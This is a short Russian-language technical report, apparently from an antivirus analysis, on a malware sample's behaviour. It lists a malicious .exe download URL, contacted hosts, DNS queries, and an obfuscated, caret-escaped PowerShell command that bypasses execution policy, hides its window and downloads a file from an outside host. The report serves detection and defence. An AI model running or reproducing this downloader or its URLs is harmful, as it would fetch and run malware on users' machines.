Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwerS^H^ELl.ex^e ^-exEcutio^nPOl^ICy^ B^Yp^AsS ^-NOP^r^oFI^lE^ -Wi^n^Do^WSTY^l^E Hidd^E^N (N^eW-^O^b^J^ec^t^ SYST^EM.^n^E^t.WeB^Clie^Nt).dow^NlO^AD^Fi^Le('http://nexcontech.co...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "pOwerS^H^ELl.ex^e ^-exEcutio^nPOl^ICy^ B^Yp^AsS ^-NOP^r^oFI^lE^ -Wi^n^Do^WSTY^l^E Hidd^E^N (N^eW-^O^b^J^ec^t^ SYST^EM.^n^E^t.WeB^Clie^Nt).dow^NlO^AD^Fi^Le('http://nexcontech.co...' (со скрытым окном)